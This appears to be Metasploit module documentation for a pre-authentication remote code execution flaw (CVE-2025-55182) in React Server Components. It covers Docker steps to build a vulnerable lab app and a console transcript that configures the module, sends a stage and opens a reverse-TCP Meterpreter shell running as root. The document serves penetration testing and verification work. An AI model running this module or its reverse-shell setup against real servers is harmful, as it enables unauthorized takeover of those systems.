vognik
1.7 KiB
1.7 KiB
Vulnerable Application
A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.
Testing
- Open
data\exploits\react2shell_cve_2025_55182directory - Build
docker build -t react2shell .
- Run
docker run -p 3000:3000 react2shell
- Open http://127.0.0.1:3000/ and make sure the app is available
Scenario
msf6 > use multi/http/react2shell_cve_2025_55182_scanner
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 172.17.0.1
RHOSTS => 172.17.0.1
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8081
FETCH_SRVPORT => 8081
msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
[*] Started reverse TCP handler on 172.17.0.1:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:6666 -> 172.17.0.2:59608) at 2025-12-05 01:12:48 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.2
OS : (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux